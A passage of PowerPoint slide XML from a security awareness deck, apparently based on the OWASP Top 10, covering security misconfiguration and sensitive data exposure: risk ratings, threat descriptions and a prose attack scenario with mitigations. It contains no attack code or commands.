              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>between components.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An automated process to verify that configurations and settings are properly configured in all environments.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="29" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1014596"/>
            <a:ext cx="6380328" cy="585604"/>
            <a:chOff x="304800" y="1014596"/>
            <a:chExt cx="6380328" cy="585604"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="30" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="304800" y="1014596"/>
              <a:ext cx="6380328" cy="585604"/>
              <a:chOff x="304800" y="997424"/>
              <a:chExt cx="6380328" cy="585604"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="50"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a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Security</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>          Weakness</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="51" name="Group 63"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="476250" y="997424"/>
                <a:ext cx="139700" cy="304800"/>
                <a:chOff x="96" y="1344"/>
                <a:chExt cx="288" cy="624"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="60" name="Oval 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="144" y="1344"/>
                  <a:ext cx="192" cy="192"/>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p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="61" name="Line 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1536"/>
                  <a:ext cx="0" cy="240"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="62" name="Line 66"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="96" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="63" name="Line 67"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="240" y="1776"/>
                  <a:ext cx="144" cy="192"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="64" name="Line 68"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="96" y="1632"/>
                  <a:ext cx="288" cy="0"/>
                </a:xfrm>
                <a:prstGeom prst="line">
                  <a:avLst/>
                </a:prstGeom>
                <a:noFill/>
                <a:ln w="19050">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:round/>
                  <a:headEnd/>
                  <a:tailEnd/>
                </a:ln>
              </p:spPr>
              <p:txBody>
                <a:bodyPr wrap="none" anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="52"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smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>    Attack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Vectors</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="53" name="AutoShape 85"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4800600" y="1049628"/>
                <a:ext cx="685800" cy="428655"/>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00" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t> Technical</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:cs typeface="+mn-cs"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="54" name="AutoShape 108"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="762000" y="1262418"/>
                <a:ext cx="534537" cy="123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55" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="2188570" y="1262418"/>
                <a:ext cx="630830" cy="1233"/>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56" name="AutoShape 140"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="50" idx="3"/>
                <a:endCxn id="53" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipV="1">
                <a:off x="3899848" y="1263956"/>
                <a:ext cx="900752" cy="421"/>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57" name="Rectangle 89"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="304800" y="1280701"/>
                <a:ext cx="516488" cy="302327"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525" algn="ctr">
                <a:noFill/>
                <a:miter lim="800000"/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none">
                <a:spAutoFit/>
              </a:bodyPr>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                  <a:lnSpc>
                    <a:spcPts val="800"/>
                  </a:lnSpc>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Threat</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="58" name="AutoShape 142"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5923128" y="1073877"/>
                <a:ext cx="762000" cy="381000"/>
              </a:xfrm>
              <a:prstGeom prst="foldedCorner">
                <a:avLst>
                  <a:gd name="adj" fmla="val 125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t"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Business</a:t>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                </a:br>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="accent4">
                        <a:lumMod val="50000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="accent4">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="59" name="AutoShape 149"/>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks noChangeShapeType="1"/>
                <a:stCxn id="53" idx="4"/>
                <a:endCxn id="58" idx="1"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5486400" y="1263956"/>
                <a:ext cx="436728" cy="421"/>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1" name="AutoShape 117"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2879480" y="1091049"/>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p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="Rectangle 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2861647" y="1235639"/>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4" name="Text Placeholder 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>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dirty="0" smtClean="0"/>
              <a:t>A5</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12995739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 name="Table 104"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="538140744"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="948520"/>
          <a:ext cx="6858000" cy="2533450"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
                <a:gridCol w="1143000"/>
              </a:tblGrid>
              <a:tr h="648770">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r>
              <a:tr h="37484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rPr>
                        <a:t>Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="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1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>DIFFICULT</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1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Prevalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>UNCOMMON</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1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>AVERAGE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Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>SEVERE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dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Application / Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Specific</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485650">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> w</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ho can gain access to your sensitive data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and any</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> backups</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of that data.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> This includes the data at rest, in transit, and even</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> in your customers’ browsers. Include both external and internal threats.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers typically don’t break crypto</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> directly. They break something else, such as steal keys, do man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user’s browser.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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nSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>The most common flaw</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> is simply not encrypting sensitive data. When crypto is employed, weak key generation and management, and weak algorithm usage is common, particularly weak password hashing techniques. Browser weaknesses are very common and easy to detect, but hard to exploit on a large scale. External attackers have difficulty detecting server side flaws due to limited access and they are also usually hard to exploit. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="0" dirty="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a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Failure frequently</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> compromises all data that should have been protected. Typically, this information includes sensitive data such as health records, credentials, personal data, credit cards, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Consider the business value of the lost data</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> and impact to your reputation. What is your legal liability if this data is exposed? Also consider the damage to your reputation.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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07" name="Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="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Example Attack Scenarios</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: An application encrypts credit card numbers in a database using automatic database encryption. However, this data is automatically decrypted when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. Alternatives include not storing credit card numbers, using tokenization, or using public key encryption.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
